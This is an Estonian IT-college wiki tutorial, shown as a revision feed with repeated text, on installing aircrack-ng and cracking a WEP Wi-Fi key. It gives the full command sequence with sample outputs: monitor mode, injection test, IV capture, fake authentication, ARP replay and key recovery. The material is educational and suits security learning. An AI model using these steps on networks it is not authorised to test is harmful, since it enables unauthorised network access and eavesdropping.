Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89365</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89365"/>
		<updated>2015-05-26T09:20:58Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Sissejuhatus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
==Üldkirjeldus==&lt;br /&gt;
&lt;br /&gt;
Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisusetaset. aiaircrack-ng kui ühe osana suurest tööriistakomplektist on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks&lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
